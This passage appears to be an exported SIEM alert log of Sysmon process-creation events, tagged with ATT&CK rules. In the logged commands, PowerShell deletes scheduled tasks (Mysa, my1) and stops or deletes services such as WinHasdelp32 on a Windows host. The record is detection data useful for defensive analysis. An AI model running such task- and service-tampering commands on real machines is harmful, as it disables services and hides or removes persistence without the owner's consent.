C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa1 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:59.926858300Z"",""eventRecordID"":""3034"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:59.923\r\nProcessGuid: {df9fc3d3-b3b3-5ecf-0000-001020c52600}\r\nProcessId: 7284\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa1 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:50:59.923"",""processGuid"":""{df9fc3d3-b3b3-5ecf-0000-001020c52600}"",""processId"":""7284"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Mysa1 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:28.278",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:59.867 +ProcessGuid: {df9fc3d3-b3b3-5ecf-0000-00107dc32600} +ProcessId: 1520 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Mysa /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium 
+Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:59.880547600Z"",""eventRecordID"":""3033"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:59.867\r\nProcessGuid: {df9fc3d3-b3b3-5ecf-0000-00107dc32600}\r\nProcessId: 1520\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:59.867"",""processGuid"":""{df9fc3d3-b3b3-5ecf-0000-00107dc32600}"",""processId"":""1520"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Mysa /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:27.995",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:59.759 +ProcessGuid: {df9fc3d3-b3b3-5ecf-0000-0010d4c12600} +ProcessId: 7264 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: 
""C:\Windows\system32\schtasks.exe"" /Delete /TN my1 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN my1 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:59.764680700Z"",""eventRecordID"":""3032"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:59.759\r\nProcessGuid: {df9fc3d3-b3b3-5ecf-0000-0010d4c12600}\r\nProcessId: 7264\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN my1 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:59.759"",""processGuid"":""{df9fc3d3-b3b3-5ecf-0000-0010d4c12600}"",""processId"":""7264"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN my1 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:27.948",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:59.687 +ProcessGuid: {df9fc3d3-b3b3-5ecf-0000-0010b4bd2600} +ProcessId: 7404 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 
(WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ClipBooks +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop ClipBooks",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:59.690405200Z"",""eventRecordID"":""3030"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:59.687\r\nProcessGuid: {df9fc3d3-b3b3-5ecf-0000-0010b4bd2600}\r\nProcessId: 7404\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop ClipBooks\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: 
DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:59.687"",""processGuid"":""{df9fc3d3-b3b3-5ecf-0000-0010b4bd2600}"",""processId"":""7404"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop ClipBooks"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:27.909",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: 
+RuleName: +UtcTime: 2020-05-28 12:50:59.644 +ProcessGuid: {df9fc3d3-b3b3-5ecf-0000-0010acbb2600} +ProcessId: 7636 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete WinHasdelp32 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete WinHasdelp32",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:59.655473400Z"",""eventRecordID"":""3028"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:59.644\r\nProcessGuid: {df9fc3d3-b3b3-5ecf-0000-0010acbb2600}\r\nProcessId: 7636\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft 
Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete WinHasdelp32\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:59.644"",""processGuid"":""{df9fc3d3-b3b3-5ecf-0000-0010acbb2600}"",""processId"":""7636"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete WinHasdelp32"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:27.887",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:59.620 +ProcessGuid: {df9fc3d3-b3b3-5ecf-0000-0010aeba2600} +ProcessId: 5936 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinHasdelp32 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop 
WinHasdelp32",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:59.624030900Z"",""eventRecordID"":""3027"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:59.620\r\nProcessGuid: {df9fc3d3-b3b3-5ecf-0000-0010aeba2600}\r\nProcessId: 5936\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinHasdelp32\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:59.620"",""processGuid"":""{df9fc3d3-b3b3-5ecf-0000-0010aeba2600}"",""processId"":""5936"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinHasdelp32"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:27.821",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:59.540 +ProcessGuid: {df9fc3d3-b3b3-5ecf-0000-0010d8b72600} +ProcessId: 6016 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinHasdadelp32 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WinHasdadelp32",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:59.544417000Z"",""eventRecordID"":""3024"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:59.540\r\nProcessGuid: 